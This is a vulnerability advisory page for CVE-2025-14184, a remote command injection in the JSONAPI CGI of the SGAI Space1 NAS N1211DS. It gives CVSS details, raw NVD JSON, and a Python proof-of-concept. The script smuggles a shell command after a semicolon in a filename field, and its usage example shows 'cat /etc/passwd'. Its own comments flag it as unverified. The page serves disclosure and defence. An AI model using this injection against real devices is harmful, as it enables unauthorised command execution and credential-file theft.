Security Vulnerability Report
CVE-2025-14184 CVSS 6.3 MEDIUM

CVE-2025-14184

Published: 2025-12-07 05:15:50
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in SGAI Space1 NAS N1211DS up to 1.0.915. Impacted is the function RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD of the file /cgi-bin/JSONAPI of the component gsaiagent. This manipulation causes command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score (v3.1)
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available for this record. Affected product as listed:

SGAI Space1 NAS N1211DS < 1.0.915
SGAI Space1 NAS N1211DS up to 1.0.915

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-14184 PoC - SGAI Space1 NAS N1211DS (up to version 1.0.915).
#
# Illustrates the command injection (CWE-74 / CWE-77) reported in the
# /cgi-bin/JSONAPI handler of the gsaiagent component.
#
# NOTE(review): the advisory's CVSS vector is PR:L (low privileges required),
# yet this script sends no credentials or session, and the advisory text does
# not confirm the JSON field names used below. Treat the listing as an
# unverified illustration of the bug class, not as a validated reproduction.
#
# For defenders: the pattern this script produces is a POST to
# /cgi-bin/JSONAPI whose file-name field carries a shell metacharacter (';').
# The advisory records no vendor response, so limiting network access to the
# management interface is the control available from this page.
import requests
import sys


def exploit_cve_2025_14184(target_url, cmd="id"):
    """Send one JSON POST to ``<target_url>/cgi-bin/JSONAPI`` and return the body.

    The request selects the RENAME_FILE action and appends ``cmd`` after a
    ';' in the ``filename`` field. The advisory names OPERATE_FILE and
    NGNIX_UPLOAD as affected as well; the original listing sketched
    equivalent requests for those actions, with the value placed in
    ``filepath`` / ``filename`` between quote-and-semicolon delimiters.

    Args:
        target_url: Base URL of the device, without a trailing path.
        cmd: Text placed after the ';' in the ``filename`` field.

    Returns:
        The HTTP response body as text, or an ``"Error: ..."`` string when
        ``requests`` raises a ``RequestException``.
    """
    endpoint = f"{target_url}/cgi-bin/JSONAPI"
    request_body = {
        "action": "RENAME_FILE",
        # An unsanitised file name reaching a shell is the root cause class.
        "filename": f"test.txt;{cmd}",
        "new_filename": "test2.txt",
    }

    try:
        reply = requests.post(endpoint, json=request_body, timeout=10)
        return reply.text
    except requests.exceptions.RequestException as exc:
        return f"Error: {exc}"


if __name__ == "__main__":
    argv = sys.argv
    prog = argv[0]

    if len(argv) < 2:
        print(f"Usage: {prog} <target_url> [command]")
        print(f"Example: {prog} http://192.168.1.100 'cat /etc/passwd'")
        sys.exit(1)

    target = argv[1]
    command = argv[2] if len(argv) > 2 else "id"

    # What gets printed is the raw HTTP response body (or the error string);
    # the label assumes the device echoes command output, which this page
    # does not demonstrate.
    result = exploit_cve_2025_14184(target, command)
    print(f"Command output:\n{result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14184", "sourceIdentifier": "[email protected]", "published": "2025-12-07T05:15:49.747", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in SGAI Space1 NAS N1211DS up to 1.0.915. Impacted is the function RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD of the file /cgi-bin/JSONAPI of the component gsaiagent. This manipulation causes command injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334604", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334604", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698568", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698569", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698570", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a80858abbf62b721a54b0", "source": "[email protected]"}, {"url": 
"https://www.notion.so/2b16cf4e528a80f2ada9dc83651a4013", "source": "[email protected]"}]}}